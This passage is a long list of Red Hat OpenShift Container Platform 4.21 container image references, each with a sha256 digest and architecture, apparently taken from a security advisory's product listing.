"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:ac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:b26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:b0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:e8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:eddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:f0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:fd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:edad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ccac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:ca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:bb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:f70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:d3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:ac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:d23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:da24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:aca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:f74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:fdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:aad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:bc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:c6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:b407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:c8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:caaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:bb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:f7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:bf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:f3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:be1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:a0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:db5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:f11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:df3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:e1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:f645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:ae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:c250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:dc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:e09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:bbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:c90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:ad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:e13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:f27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:bfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:c6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:e683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:ee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:b813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:e38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:c17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:f50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:acd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:a023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259_amd64",
